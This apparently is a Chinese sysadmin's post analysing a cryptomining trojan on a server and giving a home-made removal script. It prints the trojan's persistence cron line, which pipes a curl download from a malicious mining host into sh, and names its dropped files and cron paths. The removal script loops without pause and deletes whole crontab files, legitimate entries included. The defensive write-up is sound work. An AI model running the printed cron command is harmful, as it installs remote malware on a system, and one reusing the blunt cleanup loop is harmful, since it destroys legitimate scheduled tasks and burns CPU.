服務器上出現異常進程:
殺死進程后,還是會重新啟動。
木馬以r88.sh作為downloader首先控制服務器,通過判斷當前賬戶的權限是否為root來進行下一步的操作,若為root則在目錄/var/spool/cron/root和/var/spool/cron/crontabs/root下寫計划任務”/5 * curl -sL https://x.co/6nPMR | sh”,其中這個短鏈接還原后為https://xmr.enjoytopic.tk/12/r88.sh。若為非root賬戶,則不寫計划任務。接着均會執行下載運行rootv2.sh或lowerv2.sh(基於當前賬戶是否為root來選擇下載腳本)等一系列的操作。
木馬的挖礦組件bashd和bashe在系統中執行后,毫不掩飾地就開始挖礦,CPU直接就占據好幾百,簡直粗暴。是不是應該考慮下根據機器的當前運行狀態來“人性化挖礦”呢?
其中該木馬在多個路徑都寫入了定時任務來實現維持訪問,包括:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d。
木馬查殺:
1)嘗試殺掉bashd與bashe進程以及root.sh/rootv2.sh/lower.sh/lowerv2.sh與r88.sh這些shell進程
2)清除掉/tmp目錄下木馬釋放的文件:/tmp/bashd、/tmp/bashe、/tmp/root.sh、/tmp/rootv2.sh、/tmp/r88.sh、/tmp/pools.txt、/tmp/config.json等
3)清除3個位置的定時任務:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d
對應的自動查殺腳本如下:
#!/bin/bash
for ((i=1;i>0;i++))
do
ps -ef | grep "/tmp/bashd -p bashd" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "/tmp/bashe -p bashd" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "bash /tmp/root.sh" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "bash /tmp/r88.sh" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "bash /tmp/rootv2.sh" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "bash /tmp/lower.sh" | grep -v grep | awk '{print $2}' | xargs kill
ps -ef | grep "bash /tmp/lowerv2.sh" | grep -v grep | awk '{print $2}' | xargs kill
rm /tmp/bashd /tmp/bashe /tmp/config.json /tmp/root.sh /tmp/rootv2.sh /tmp/r88.sh /tmp/pools.txt -r
rm /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root
done
親測好使。。。